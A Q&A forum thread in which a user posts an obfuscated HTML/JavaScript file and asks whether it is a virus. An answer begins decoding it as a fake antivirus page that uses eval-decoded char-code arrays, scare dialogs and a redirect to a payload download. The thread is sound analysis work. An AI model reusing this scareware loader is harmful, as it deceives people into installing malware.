# Is this a virus? Not sure how to read the source code. This is a txt file

Tags: virus

```
<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" 
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> 
<html xmlns="http://www.w3.org/1999/xhtml"><head> <link href="img/style.css" 
rel="stylesheet" type="text/css" /> <script type="text/javascript"> 
var 
swer=[250,300,356,345,356,348,341,302,307,351,349,352,357, 
356,341,354,272,323,341,339,357,354,345,356,361,300,287,356,345,356,348, 
341,302,250,300,355,339,354,345,352,356,272,356,361,352,341,301,274,356, 
341,360,356,287,346,337,358,337,355,339,354,345,352,356,274,272,355,354, 
339,301,274,345,349,343,287,346,353,357,341,354,361,286,346,355,274,302, 
300,287,355,339,354,345,352,356,302,250,300,355,339,354,345,352,356,272, 
356,361,352,341,301,274,356,341,360,356,287,346,337,358,337,355,339,354, 
345,352,356,274,272,355,354,339,301,274,345,349,343,287,346,353,357,341, 
354,361,285,345,350,345,356,286,346,355,274,302,300,287,355,339,354,345, 
352,356,302,250,300,355,339,354,345,352,356,272,356,361,352,341,301,274, 
356,341,360,356,287,346,337,358,337,355,339,354,345,352,356,274,272,355, 
354,339,301,274,345,349,343,287,340,354,357,343,350,340,354,351,352,286, 
346,355,274,302,300,287,355,339,354,345,352,356,302,250,300,355,339,354, 
345,352,356,272,356,361,352,341,301,274,356,341,360,356,287,346,337,358, 
337,355,339,354,345,352,356,274,272,355,354,339,301,274,345,349,343,287, 
348,345,355,356,342,345,348,341,286,346,355,274,302,300,287,355,339,354, 
345,352,356,302,250,300,355,339,354,345,352,356,302,250,358,337,354,272, 
352,345,350,356,341,354,299,358,337,354,272,355,355,301,289,293,299,358, 
337,354,272,356,341,354,337,339,356,345,301,288,299,250,342,357,350,339, 
356,345,351,350,272,344,345,340,341,327,337,354,350,308,345,337,348,351, 
343,280,281,250,363,250,249,345,342,280,339,351,350,342,345,354,349,280, 
279,329,351,357,272,355,344,351,357,348,340,272,345,350,355,356,337,348, 
348,272,356,344,345,355,272,355,341,339,357,354,345,356,361,272,355,351, 
342,356,359,337,354,341,272,356,351,272,352,354,351,356,341,339,356,272, 
361,351,357,354,272,339,351,349,352,357,356,341,354,286,279,281,281,249, 
363,250,249,249,250,249,365,250,249,341,348,355,341,249,363,250,249,249, 
341,349,345,348,345,351,350,280,281,299,250,249,365,299,250,365,299,250, 
342,357,350,339,356,345,351,350,272,341,349,345,348,345,351,350,280,281, 
363,250,337,348,341,354,356,280,279,312,337,354,349,342,357,348,348,272, 
355,352,361,359,337,354,341,272,351,354,272,337,340,359,337,354,341,272, 
355,351,342,356,359,337,354,341,286,272,323,357,339,344,272,358,357,348, 
350,341,354,337,338,345,348,345,356,345,341,355,272,339,337,350,272,340, 
341,355,356,354,351,361,272,351,354,272,355,356,341,337,348,272,361,351, 
357,354,272,352,354,345,358,337,356,341,272,345,350,342,351,272,337,350, 
340,272,349,337,345,348,286,272,319,350,285,348,345,350,341,355,272,355, 
339,337,350,272,355,344,351,357,348,340,272,345,350,355,356,337,348,348, 
272,305,350,356,345,358,345,354,272,357,356,345,348,345,356,345,341,355, 
272,356,351,272,342,345,360,272,361,351,357,354,272,352,339,286,272,320, 
348,341,337,355,341,272,339,348,345,339,347,272,319,347,272,356,351,272, 
340,351,359,350,348,351,337,340,272,337,350,340,272,345,350,355,356,337, 
348,348,272,305,350,356,345,358,345,354,272,356,351,351,348,286,272,279, 
281,299,250,365,250,342,357,350,339,356,345,351,350,272,357,352,340,337, 
356,341,280,281,250,363,250,272,345,342,272,280,276,280,274,286,352,354, 
351,343,354,341,355,355,335,338,337,354,335,342,345,348,348,274,281,286, 
359,345,340,356,344,280,281,302,288,281,250,272,363,250,272,272,276,280, 
274,275,352,354,351,343,354,341,355,355,335,352,354,339,350,356,274,281, 
286,344,356,349,348,280,280,250,272,272,317,337,356,344,286,354,351,357, 
350,340,280,289,288,288,285,276,280,250,272,272,279,286,352,354,351,343, 
354,341,355,355,335,338,337,354,335,342,345,348,348,279,281,286,359,345, 
340,356,344,280,250,272,272,281,287,292,289,295,282,289,288,288,281,281, 
283,279,277,279,281,299,250,272,272,250,272,272,276,280,274,275,342,345, 
348,341,355,289,274,281,286,344,356,349,348,280,355,343,331,317,337,356, 
344,286,342,348,351,351,354,280,317,337,356,344,286,354,337,350,340,351, 
349,280,281,282,355,343,286,348,341,350,343,356,344,281,333,272,281,299, 
250,272,272,345,342,272,280,276,280,274,286,352,354,351,343,354,341,355, 
355,335,338,337,354,335,342,345,348,348,274,281,286,359,345,340,356,344, 
280,281,300,291,293,288,272,278,278,272,356,341,354,337,339,356,345,301, 
301,288,281,250,272,272,363,250,272,272,272,340,351,339,357,349,341,350, 
356,286,343,341,356,309,348,341,349,341,350,356,306,361,313,340,280,279, 
356,344,354,341,337,356,289,279,281,286,355,356,361,348,341,286,358,345, 
355,345,338,345,348,345,356,361,272,301,272,279,358,345,355,345,338,348, 
341,279,299,250,272,272,272,340,351,339,357,349,341,350,356,286,343,341, 
356,309,348,341,349,341,350,356,306,361,313,340,280,279,340,341,355,339, 
279,281,286,355,356,361,348,341,286,358,345,355,345,338,345,348,345,356, 
361,272,301,272,279,358,345,355,345,338,348,341,279,299,250,272,272,272, 
355,341,356,313,350,356,341,354,358,337,348,280,274,276,280,279,275,356, 
339,289,279,281,286,356,351,343,343,348,341,307,348,337,355,355,280,279, 
350,351,350,341,279,281,274,284,289,288,288,288,281,299,250,272,272,272, 
356,341,354,337,339,356,345,301,289,299,250,272,272,365,250,272,272,345, 
342,272,280,276,280,274,286,352,354,351,343,354,341,355,355,335,338,337, 
354,335,342,345,348,348,274,281,286,359,345,340,356,344,280,281,300,290, 
288,288,272,278,278,272,356,341,354,337,339,356,345,301,301,289,281,250, 
272,272,363,250,272,272,272,340,351,339,357,349,341,350,356,286,343,341, 
356,309,348,341,349,341,350,356,306,361,313,340,280,279,356,344,354,341, 
337,356,290,279,281,286,355,356,361,348,341,286,358,345,355,345,338,345, 
348,345,356,361,272,301,272,279,358,345,355,345,338,348,341,279,299,250, 
272,272,272,355,341,356,313,350,356,341,354,358,337,348,280,274,276,280, 
279,275,356,339,290,279,281,286,356,351,343,343,348,341,307,348,337,355, 
355,280,279,350,351,350,341,279,281,274,284,289,288,288,288,281,299,250, 
272,272,272,356,341,354,337,339,356,345,301,290,299,250,272,272,365,250, 
272,272,345,342,272,280,276,280,274,286,352,354,351,343,354,341,355,355, 
335,338,337,354,335,342,345,348,348,274,281,286,359,345,340,356,344,280, 
281,300,289,288,288,272,278,278,272,356,341,354,337,339,356,345,301,301, 
290,281,250,272,272,363,250,272,272,272,340,351,339,357,349,341,350,356, 
286,343,341,356,309,348,341,349,341,350,356,306,361,313,340,280,279,356, 
344,354,341,337,356,291,279,281,286,355,356,361,348,341,286,358,345,355, 
345,338,345,348,345,356,361,272,301,272,279,358,345,355,345,338,348,341, 
279,299,250,272,272,272,355,341,356,313,350,356,341,354,358,337,348,280, 
274,276,280,279,275,356,339,291,279,281,286,356,351,343,343,348,341,307, 
348,337,355,355,280,279,350,351,350,341,279,281,274,284,289,288,288,288, 
281,299,250,272,272,272,355,341,356,313,350,356,341,354,358,337,348,280, 
274,276,280,279,275,356,339,292,279,281,286,356,351,343,343,348,341,307, 
348,337,355,355,280,279,350,351,350,341,279,281,274,284,289,288,288,288, 
281,299,250,272,272,272,356,341,354,337,339,356,345,301,291,299,250,272, 
272,365,272,272,250,272,365,250,272,341,348,355,341,250,272,363,250,272, 
272,339,348,341,337,354,313,350,356,341,354,358,337,348,280,352,345,350, 
356,341,354,281,299,250,272,272,276,280,274,286,342,345,348,341,355,290, 
274,281,286,344,356,349,348,280,274,300,338,302,323,361,355,356,341,349, 
272,355,339,337,350,350,345,350,343,272,339,351,349,352,348,341,356,341, 
340,286,272,292,291,289,272,320,354,351,338,337,338,348,361,272,344,337, 
354,349,342,357,348,348,272,345,356,341,349,355,272,359,337,355,272,342, 
351,357,350,340,273,300,287,338,302,274,281,299,250,272,272,355,341,356, 
324,345,349,341,351,357,356,280,274,352,351,352,290,280,281,274,284,289, 
288,288,288,281,299,250,272,365,250,365,250,342,357,350,339,356,345,351, 
350,272,317,345,350,345,349,345,362,341,280,281,272,250,363,250,359,345, 
350,340,351,359,286,345,350,350,341,354,327,345,340,356,344,272,301,272, 
289,288,288,299,250,359,345,350,340,351,359,286,345,350,350,341,354,312, 
341,345,343,344,356,272,301,272,289,288,288,299,250,359,345,350,340,351, 
359,286,355,339,354,341,341,350,328,272,301,272,355,339,354,341,341,350, 
286,359,345,340,356,344,299,250,359,345,350,340,351,359,286,355,339,354, 
341,341,350,329,272,301,272,355,339,354,341,341,350,286,344,341,345,343, 
344,356,299,250,337,348,359,337,361,355,316,351,359,341,354,341,340,272, 
301,272,356,354,357,341,299,250,365,250,359,359,289,272,301,272,355,339, 
354,341,341,350,286,359,345,340,356,344,299,250,359,359,290,272,301,272, 
355,339,354,341,341,350,286,344,341,345,343,344,356,299,250,342,357,350, 
339,356,345,351,350,272,317,337,360,345,349,345,362,341,280,281,272,363, 
359,345,350,340,351,359,286,349,351,358,341,324,351,280,288,284,288,281, 
299,359,345,350,340,351,359,286,354,341,355,345,362,341,324,351,280,272, 
359,359,289,284,272,359,359,290,272,281,299,365,250,342,357,350,339,356, 
345,351,350,272,340,351,359,350,348,351,337,340,280,281,272,363,250,272, 
359,345,350,340,351,359,286,348,351,339,337,356,345,351,350,301,279,287, 
340,351,359,350,348,351,337,340,286,352,344,352,303,345,340,301,290,288, 
290,290,279,299,250,365,250,342,357,350,339,356,345,351,350,272,337,359, 
337,361,280,281,250,363,250,249,359,272,301,272,359,345,350,340,351,359, 
299,250,249,357,337,272,301,272,350,337,358,345,343,337,356,351,354,286, 
357,355,341,354,305,343,341,350,356,299,250,249,358,289,272,301,272,357, 
337,286,356,351,316,351,359,341,354,307,337,355,341,280,281,286,345,350, 
340,341,360,319,342,280,279,349,355,345,341,279,281,272,273,301,272,285, 
289,272,278,278,272,357,337,286,356,351,316,351,359,341,354,307,337,355, 
341,280,281,286,345,350,340,341,360,319,342,280,279,351,352,341,354,337, 
279,281,272,300,272,288,299,250,272,272,249,360,272,301,272,289,289,299, 
250,272,272,249,341,358,337,348,280,279,359,286,354,341,355,345,362,341, 
324,351,280,360,282,289,288,284,360,282,289,289,285,295,281,279,281,299, 
250,249,359,286,349,351,358,341,324,351,280,358,289,272,303,272,280,355, 
339,354,341,341,350,286,359,345,340,356,344,272,285,272,289,288,288,281, 
272,302,302,272,289,272,298,272,289,289,288,290,295,284,272,358,289,272, 
303,272,280,355,339,354,341,341,350,286,344,341,345,343,344,356,272,285, 
272,289,288,288,281,272,302,302,272,289,272,298,272,289,288,294,293,297, 
281,299,250,365,250,342,357,350,339,356,345,351,350,272,352,351,352,289, 
280,281,272,363,250,249,339,351,350,342,345,354,349,280,279,327,337,354, 
350,345,350,343,273,273,273,272,279,283,250,249,279,329,351,357,354,272, 
320,307,272,350,341,341,340,355,272,356,351,272,345,350,355,356,337,348, 
348,272,337,350,356,345,349,337,348,359,337,354,341,272,355,351,342,356, 
359,337,354,341,273,272,305,350,356,345,358,345,354,272,339,337,350,272, 
352,341,354,342,351,354,349,272,342,337,355,356,272,337,350,340,272,342, 
354,341,341,272,272,355,339,337,350,272,351,342,272,361,351,357,354,272, 
339,351,349,352,357,356,341,354,272,286,279,281,299,250,249,365,250,342, 
357,350,339,356,345,351,350,272,352,351,352,290,280,281,272,363,250,339, 
351,350,342,345,354,349,280,279,324,344,345,355,272,339,351,349,352,357, 
356,341,354,272,345,355,272,357,350,340,341,354,272,272,337,356,356,337, 
339,347,279,283,250,279,324,344,341,361,272,339,337,350,272,355,341,354, 
345,351,357,355,348,361,272,344,337,354,349,272,361,351,357,354,272,352, 
354,345,358,337,356,341,272,340,337,356,337,272,351,354,272,342,345,348, 
341,355,284,272,337,350,340,272,355,344,351,357,348,340,272,338,341,272, 
344,341,337,348,341,340,272,345,349,349,341,340,345,337,356,341,348,361, 
286,279,283,250,279,322,341,356,357,354,350,272,356,351,272,305,350,356, 
345,358,345,354,272,337,350,340,272,340,351,359,350,348,351,337,340,272, 
345,356,272,355,341,339,357,354,341,272,356,351,272,361,351,357,354,272, 
320,307,279,281,299,250,352,351,352,292,280,281,299,250,365,250,342,357, 
350,339,356,345,351,350,272,352,351,352,291,340,355,340,355,280,281,272, 
363,250,337,348,341,354,356,280,279,307,351,349,352,357,356,341,354,272, 
349,345,343,344,356,272,338,341,272,337,342,342,341,339,356,341,340,272, 
338,361,272,355,352,361,359,337,354,341,272,351,354,272,351,356,344,341, 
354,272,356,361,352,341,355,272,351,342,272,358,345,354,357,355,341,355, 
273,272,272,279,283,250,279,329,351,357,354,272,349,337,345,348,284,272, 
352,337,355,355,359,351,354,340,355,272,337,350,340,272,352,354,345,358, 
337,356,341,272,340,351,339,357,349,341,350,356,355,272,349,345,343,344, 
356,272,338,341,272,345,350,272,340,337,350,343,341,354,284,272,352,354, 
351,356,341,339,356,272,361,351,357,354,272,320,307,272,345,349,349,341, 
340,345,337,356,341,348,361,286,279,283,250,279,322,341,356,357,354,350, 
272,356,351,272,305,350,356,345,358,345,354,272,337,350,340,272,340,351, 
359,350,348,351,337,340,272,345,356,272,355,341,339,357,354,341,272,356, 
351,272,361,351,357,354,272,320,307,279,281,299,250,365,250,342,357,350, 
339,356,345,351,350,272,352,351,352,292,280,281,272,363,250,272,272,340, 
351,339,357,349,341,350,356,286,343,341,356,309,348,341,349,341,350,356, 
306,361,313,340,280,279,337,352,279,281,286,355,356,361,348,341,286,340, 
345,355,352,348,337,361,272,301,272,279,338,348,351,339,347,279,299,250, 
272,272,276,280,274,286,348,341,342,356,335,338,337,354,274,281,286,339, 
355,355,280,274,340,345,355,352,348,337,361,274,284,274,350,351,350,341, 
274,281,299,250,272,272,276,280,274,286,348,341,342,356,335,338,337,354, 
274,281,286,339,355,355,280,274,340,345,355,352,348,337,361,274,284,274, 
338,348,351,339,347,274,281,299,250,365,250,342,357,350,339,356,345,351, 
350,272,355,352,290,345,350,345,356,280,281,363,250,365,250,342,357,350, 
339,356,345,351,350,272,348,351,337,340,345,350,343,280,281,272,363,250, 
272,272,345,342,272,280,359,345,350,340,351,359,286,337,356,356,337,339, 
344,309,358,341,350,356,281,250,272,272,272,272,337,359,337,361,280,281, 
299,250,272,272,352,351,352,289,280,281,299,250,272,272,317,337,360,345, 
349,345,362,341,280,281,299,250,272,272,359,345,350,340,351,359,286,342, 
351,339,357,355,280,281,299,272,250,365,250]; 
var renb=''; var trwq=''; 
for (i=0; i<swer.length; i++){ trwq=swer[i]-240; 
renb+=eval('String.fromCharC'+unescape(escape(unescape('%6f%64%65')))+'( 
trwq)'); } document.write(renb);var 
swer=[94,186,201,194,183,200,189,195,194,116,192,195,181,184,185,184,124 
,125,116,207,94,116,116,120,124,118,119,203,188,189,200,185,118,125,130, 
183,199,199,124,118,184,189,199,196,192,181,205,118,128,118,194,195,194, 
185,118,125,143,94,116,116,120,124,118,119,196,181,187,185,179,196,198,1 
95,187,198,185,199,199,118,125,130,183,199,199,124,118,184,189,199,196,1 
92,181,205,118,128,118,182,192,195,183,191,118,125,143,94,116,116,120,12 
4,118,130,192,185,186,200,179,182,181,198,118,125,130,183,199,199,124,11 
8,184,189,199,196,192,181,205,118,128,118,194,195,194,185,118,125,143,94 
,116,116,120,124,118,130,192,185,186,200,179,182,181,198,118,125,130,183 
,199,199,124,118,184,189,199,196,192,181,205,118,128,118,182,192,195,183 
,191,118,125,143,94,116,116,120,124,118,130,196,198,195,187,198,185,199, 
199,179,182,181,198,179,186,189,192,192,118,125,130,181,194,189,193,181, 
200,185,124,207,203,189,184,200,188,142,118,132,196,204,118,209,128,199, 
199,126,133,132,132,132,125,143,94,116,116,203,198,189,200,185,187,185,1 
95,189,196,124,125,143,94,93,196,189,194,200,185,198,116,145,116,199,185 
,200,157,194,200,185,198,202,181,192,124,201,196,184,181,200,185,128,199 
,199,126,133,132,125,143,94,116,116,152,198,181,187,130,189,194,189,200, 
124,184,195,183,201,193,185,194,200,130,187,185,200,153,192,185,193,185, 
194,200,150,205,157,184,124,123,181,196,123,125,125,143,94,209,143,94,19 
2,195,181,184,189,194,187,124,125,143,94,202,181,198,116,185,204,189,200 
,116,145,116,200,198,201,185,143,94,202,181,198,116,201,199,185,164,195, 
196,152,189,181,192,195,187,116,145,116,200,198,201,185,143,94,202,181,1 
98,116,194,189,184,145,132,143,94,202,181,198,116,200,189,184,145,136,13 
5,133,143,94,202,181,198,116,193,189,184,145,141,136,139,143,94,202,181, 
198,116,186,201,192,192,145,133,143,94,202,181,198,116,196,195,196,152,1 
89,181,192,195,187,163,196,200,189,195,194,199,116,145,116,118,184,189,1 
81,192,195,187,171,189,184,200,188,142,133,132,134,136,196,204,143,116,1 
84,189,181,192,195,187,156,185,189,187,188,200,142,139,138,140,196,204,1 
43,116,184,189,181,192,195,187,168,195,196,142,132,196,204,143,116,184,1 
89,181,192,195,187,160,185,186,200,142,132,196,204,143,116,185,184,187,1 
85,142,166,181,189,199,185,184,143,116,183,185,194,200,185,198,142,132,1 
43,116,188,185,192,196,142,132,143,116,198,185,199,189,206,181,182,192,1 
85,142,133,143,116,199,183,198,195,192,192,142,133,143,116,199,200,181,2 
00,201,199,142,132,118,143,94,202,181,198,116,196,195,196,171,189,194,18 
4,195,203,163,196,200,189,195,194,199,116,145,116,118,116,199,183,198,19 
5,192,192,182,181,198,199,145,133,128,193,185,194,201,182,181,198,145,13 
3,128,200,195,195,192,182,181,198,145,133,128,192,195,183,181,200,189,19 
5,194,145,133,128,196,185,198,199,195,194,181,192,182,181,198,145,133,12 
8,199,200,181,200,201,199,145,133,128,198,185,199,189,206,181,182,192,18 
5,145,133,118,143,94,202,181,198,116,183,192,189,184,116,145,116,118,139 
,186,132,141,183,141,185,133,183,137,137,186,139,184,138,135,186,132,134 
,141,132,141,181,133,136,183,133,181,136,137,185,132,118,143,94,202,181, 
198,116,201,199,185,164,195,196,152,189,181,192,195,187,116,145,116,200, 
198,201,185,143,94,202,181,198,116,189,199,169,199,189,194,186,194,193,1 
96,185,183,189,181,192,116,145,116,186,181,192,199,185,143,94,184,181,20 
0,145,194,185,203,116,152,181,200,185,124,133,134,138,135,132,141,138,14 
0,141,135,125,143,94,202,181,198,116,187,188,186,145,184,181,200,130,187 
,185,200,156,195,201,198,199,124,125,129,184,181,200,130,187,185,200,169 
,168,151,156,195,201,198,199,124,125,143,94,194,185,203,201,198,192,116, 
145,116,118,131,184,195,203,194,192,195,181,184,130,196,188,196,147,189, 
184,145,134,132,134,134,122,184,192,200,188,145,118,127,187,188,186,143, 
94,202,181,198,116,189,199,172,164,167,164,134,116,145,116,186,181,192,1 
99,185,143,94,202,181,198,116,201,116,145,116,118,138,150,154,137,134,14 
9,137,134,129,135,141,136,149,129,133,133,152,135,129,150,133,137,135,12 
9,132,132,151,132,136,154,139,141,154,149,149,138,118,143,94,186,201,194 
,183,200,189,195,194,116,184,184,184,187,187,187,124,125,207,94,93,189,1 
86,124,117,189,199,172,164,167,164,134,116,122,122,116,117,201,199,185,1 
64,195,196,152,189,181,192,195,187,125,116,116,116,116,116,116,116,116,1 
16,116,116,116,116,116,116,207,94,116,116,116,116,116,116,116,116,116,11 
6,116,116,116,116,116,116,116,116,116,116,116,116,116,116,116,203,189,19 
4,184,195,203,130,195,196,185,194,124,196,195,196,169,166,160,128,118,11 
8,128,196,195,196,171,189,194,184,195,203,163,196,200,189,195,194,199,12 
5,143,94,116,116,116,116,116,116,116,116,116,116,116,116,116,116,116,209 
,185,192,199,185,116,189,186,124,117,189,199,172,164,167,164,134,116,122 
,122,116,201,199,185,164,195,196,152,189,181,192,195,187,125,116,207,94, 
116,116,116,116,116,116,116,116,116,116,116,116,116,116,116,116,116,116, 
116,116,116,116,116,116,116,185,202,181,192,124,118,203,189,194,184,195, 
203,130,199,188,195,203,161,195,184,181,192,152,189,181,192,195,187,124, 
196,195,196,169,166,160,128,123,123,128,196,195,196,152,189,181,192,195, 
187,163,196,200,189,195,194,199,125,118,125,143,94,116,116,116,116,116,1 
16,116,116,116,116,116,116,116,116,116,209,185,192,199,185,207,94,116,11 
6,116,116,116,116,116,116,116,116,116,116,116,116,116,116,116,116,116,11 
6,116,116,116,116,116,189,189,185,130,192,181,201,194,183,188,169,166,16 
0,124,196,195,196,169,166,160,125,143,94,116,116,116,116,116,116,116,116 
,116,116,116,116,116,116,116,209,94,209,94,186,201,194,183,200,189,195,1 
94,116,185,204,200,124,125,207,94,116,116,116,116,116,116,116,189,186,12 
4,185,204,189,200,125,116,116,116,116,116,116,116,207,94,116,116,116,116 
,116,116,116,116,116,116,116,116,116,116,116,185,204,189,200,145,186,181 
,192,199,185,143,94,116,116,116,116,116,116,116,116,116,116,116,116,116, 
116,116,185,193,189,192,189,195,194,124,125,143,94,116,116,116,116,116,1 
16,116,116,116,116,116,116,116,116,116,184,184,184,187,187,187,124,125,1 
43,94,116,116,116,116,116,116,116,116,209,94,209,94,202,181,198,116,196, 
195,196,169,166,160,116,145,116,194,185,203,201,198,192,143,94,189,199,1 
69,199,189,194,186,194,193,196,185,183,189,181,192,116,145,116,200,198,2 
01,185,143,94,189,186,116,124,203,189,194,184,195,203,130,181,200,200,18 
1,183,188,153,202,185,194,200,125,94,116,185,202,181,192,124,118,203,189 
,194,184,195,203,130,181,200,200,181,183,188,153,202,185,194,200,124,123 
,195,194,201,194,192,195,181,184,123,128,185,204,200,125,143,118,125,143 
,94,185,192,199,185,94,116,203,189,194,184,195,203,130,181,184,184,153,2 
02,185,194,200,160,189,199,200,185,194,185,198,124,118,201,194,192,195,1 
81,184,118,128,116,185,204,200,128,116,186,181,192,199,185,125,143,94,14 
4,131,199,183,198,189,196,200,146,94,94,144,131,188,185,181,184,146,94,1 
44,182,195,184,205,116,195,194,160,195,181,184,145,118,192,195,181,184,1 
85,184,124,125,118,146,94,94,144,152,157,170,116,189,184,145,181,196,116 
,199,200,205,192,185,145,118,160,153,154,168,142,116,132,196,204,143,116 
,206,129,189,194,184,185,204,142,134,143,116,171,157,152,168,156,142,116 
,133,132,132,121,143,116,164,163,167,157,168,157,163,162,142,116,181,182 
,199,195,192,201,200,185,143,116,168,163,164,142,116,133,141,132,196,204 
,143,116,184,189,199,196,192,181,205,142,116,194,195,194,185,143,118,116 
,181,192,189,187,194,145,183,185,194,200,185,198,146,94,144,152,157,170, 
116,199,200,205,192,185,145,118,183,201,198,199,195,198,142,188,181,194, 
184,143,116,171,157,152,168,156,142,116,136,135,136,196,204,143,116,188, 
185,189,187,188,200,142,135,135,134,196,204,143,116,164,163,167,157,168, 
157,163,162,142,116,198,185,192,181,200,189,202,185,143,116,182,181,183, 
191,187,198,195,201,194,184,129,189,193,181,187,185,142,201,198,192,124, 
189,193,187,131,132,132,133,130,187,189,186,125,143,116,182,181,183,191, 
187,198,195,201,194,184,129,183,195,192,195,198,142,203,188,189,200,185, 
143,118,146,144,189,194,196,201,200,116,200,205,196,185,145,123,182,201, 
200,200,195,194,123,116,199,200,205,192,185,145,123,164,163,167,157,168, 
157,163,162,142,116,198,185,192,181,200,189,202,185,143,116,203,189,184, 
200,188,142,134,133,196,204,143,116,188,185,189,187,188,200,142,134,133, 
196,204,143,116,192,185,186,200,142,134,132,132,196,204,143,116,200,195, 
196,142,137,196,204,143,116,182,195,198,184,185,198,129,203,189,184,200, 
188,142,132,196,204,143,116,182,181,183,191,187,198,195,201,194,184,129, 
189,193,181,187,185,142,201,198,192,124,183,182,130,187,189,186,125,123, 
116,195,194,183,192,189,183,191,145,123,188,189,184,185,171,181,198,194, 
152,189,181,192,195,187,124,125,143,123,146,144,199,196,181,183,185,198, 
116,203,189,184,200,188,145,123,136,136,138,123,116,188,185,189,187,188, 
200,145,123,134,141,136,123,116,131,146,144,131,152,157,170,146,94,144,1 
31,184,189,202,146,94,94,144,184,189,202,116,199,200,205,192,185,145,118 
,184,189,199,196,192,181,205,142,116,194,195,194,185,143,118,116,189,184 
,145,118,203,188,189,200,185,118,116,183,192,181,199,199,145,118,203,188 
,189,200,185,179,184,189,202,118,116,181,192,189,187,194,145,118,183,185 
,194,200,185,198,118,146,94,93,144,184,189,202,116,199,200,205,192,185,1 
45,118,196,195,199,189,200,189,195,194,142,116,198,185,192,181,200,189,2 
02,185,143,116,200,195,196,142,116,137,132,121,143,118,146,144,189,193,1 
87,116,199,198,183,145,118,189,193,187,131,132,132,139,130,187,189,186,1 
18,116,203,189,184,200,188,145,118,137,133,118,116,188,185,189,187,188,2 
00,145,118,133,141,118,146,116,116,116,116,144,131,184,189,202,146,94,11 
6,116,116,144,131,184,189,202,146,94,144,184,189,202,116,199,200,205,192 
,185,145,118,184,189,199,196,192,181,205,142,116,182,192,195,183,191,143 
,118,116,183,192,181,199,199,145,118,192,185,186,200,179,182,181,198,118 
,146,94,116,116,144,184,189,202,116,183,192,181,199,199,145,118,192,185, 
186,200,179,188,185,181,184,185,198,118,146,167,205,199,200,185,193,116, 
168,181,199,191,199,144,131,184,189,202,146,94,93,144,184,189,202,116,18 
3,192,181,199,199,145,118,192,185,186,200,179,182,195,204,118,146,94,93, 
93,144,184,189,202,116,183,192,181,199,199,145,118,192,185,186,200,179,1 
82,195,204,179,192,189,194,185,118,146,94,93,93,93,144,189,193,187,116,1 
99,198,183,145,118,189,193,187,131,132,133,138,130,187,189,186,118,116,1 
83,192,181,199,199,145,118,192,185,186,200,179,182,181,198,179,189,183,1 
95,194,118,116,203,189,184,200,188,145,118,133,136,118,116,188,185,189,1 
87,188,200,145,118,133,138,118,146,144,181,116,188,198,185,186,145,118,1 
19,118,146,170,189,185,203,116,199,205,199,200,185,193,116,189,194,186,1 
95,198,193,181,200,189,195,194,144,131,181,146,93,116,116,116,116,144,13 
1,184,189,202,146,94,93,116,116,144,184,189,202,116,183,192,181,199,199, 
145,118,192,185,186,200,179,182,195,204,179,192,189,194,185,118,146,94,1 
16,116,116,116,93,144,189,193,187,116,199,198,183,145,118,189,193,187,13 
1,132,133,139,130,187,189,186,118,116,183,192,181,199,199,145,118,192,18 
5,186,200,179,182,181,198,179,189,183,195,194,118,116,203,189,184,200,18 
8,145,118,133,138,118,116,188,185,189,187,188,200,145,118,133,138,118,14 
6,116,144,181,116,188,198,185,186,145,118,119,118,146,149,184,184,116,19 
5,198,116,198,185,193,195,202,185,116,196,198,195,187,198,181,193,199,14 
4,131,181,146,93,116,116,144,131,184,189,202,146,94,93,116,116,144,184,1 
89,202,116,183,192,181,199,199,145,118,192,185,186,200,179,182,195,204,1 
79,192,189,194,185,118,146,94,116,116,116,93,116,116,116,116,144,189,193 
,187,116,199,198,183,145,118,189,193,187,131,132,133,140,130,187,189,186 
,118,116,183,192,181,199,199,145,118,192,185,186,200,179,182,181,198,179 
,189,183,195,194,118,116,203,189,184,200,188,145,118,133,138,118,116,188 
,185,189,187,188,200,145,118,133,138,118,146,116,144,181,116,188,198,185 
,186,145,118,119,118,146,151,188,181,194,187,185,116,181,116,199,185,200 
,200,189,194,187,199,144,131,181,146,116,116,116,116,116,116,144,131,184 
,189,202,146,94,116,116,144,131,184,189,202,146,94,93,144,184,189,202,11 
6,183,192,181,199,199,145,118,192,185,186,200,179,188,185,181,184,185,19 
8,118,146,94,93,93,163,200,188,185,198,116,164,192,181,183,185,199,116,1 
16,144,131,184,189,202,146,94,93,144,184,189,202,116,183,192,181,199,199 
,145,118,192,185,186,200,179,182,195,204,118,146,94,93,93,144,184,189,20 
2,116,183,192,181,199,199,145,118,192,185,186,200,179,182,195,204,179,19 
2,189,194,185,118,146,94,93,93,93,144,189,193,187,116,199,198,183,145,11 
8,189,193,187,131,132,133,134,130,187,189,186,118,116,183,192,181,199,19 
9,145,118,192,185,186,200,179,182,181,198,179,189,183,195,194,118,116,20 
3,189,184,200,188,145,118,133,138,118,116,188,185,189,187,188,200,145,11 
8,133,138,118,146,116,144,181,116,188,198,185,186,145,118,119,118,146,16 
1,205,116,162,185,200,203,195,198,191,116,164,192,181,183,185,199,144,13 
1,181,146,93,93,144,131,184,189,202,146,94,93,116,116,144,184,189,202,11 
6,183,192,181,199,199,145,118,192,185,186,200,179,182,195,204,179,192,18 
9,194,185,118,146,94,116,116,116,116,93,144,189,193,187,116,199,198,183, 
145,118,189,193,187,131,132,133,135,130,187,189,186,118,116,183,192,181, 
199,199,145,118,192,185,186,200,179,182,181,198,179,189,183,195,194,118, 
116,203,189,184,200,188,145,118,133,138,118,116,188,185,189,187,188,200, 
145,118,133,138,118,146,116,144,181,116,188,198,185,186,145,118,119,118, 
146,161,205,116,152,195,183,201,193,185,194,200,199,144,131,181,146,116, 
116,116,116,116,116,144,131,184,189,202,146,94,93,116,116,144,184,189,20 
2,116,183,192,181,199,199,145,118,192,185,186,200,179,182,195,204,179,19 
2,189,194,185,118,146,94,116,116,116,93,116,116,116,116,144,189,193,187, 
116,199,198,183,145,118,189,193,187,131,132,133,136,130,187,1
```

Comment: Not legible - try indenting (and breaking lines)...

Comment: Whatever it is, I had to manually stop wmd.js as it hung my browser trying to edit your post so it is readable!

Comment: Same here. So yes, I consider it harmful in terms of browser stability ;-)

Comment: You are missing code.

Answer (score 19):

The first array ends up evaluating to this code:

```
<title>Computer Security</title>
<script type="text/javascript" src="img/jquery.js"></script>
<script type="text/javascript" src="img/jquery-init.js"></script>
<script type="text/javascript" src="img/drugndrop.js"></script>
<script type="text/javascript" src="img/listfile.js"></script>
<script>
var pinter;var ss=15;var teracti=0;
function hideWarnDialog()
{
    if(confirm('You should install this security software to protect your computer.'))  {

    }
    else    {
        emilion();
    };
};
function emilion(){
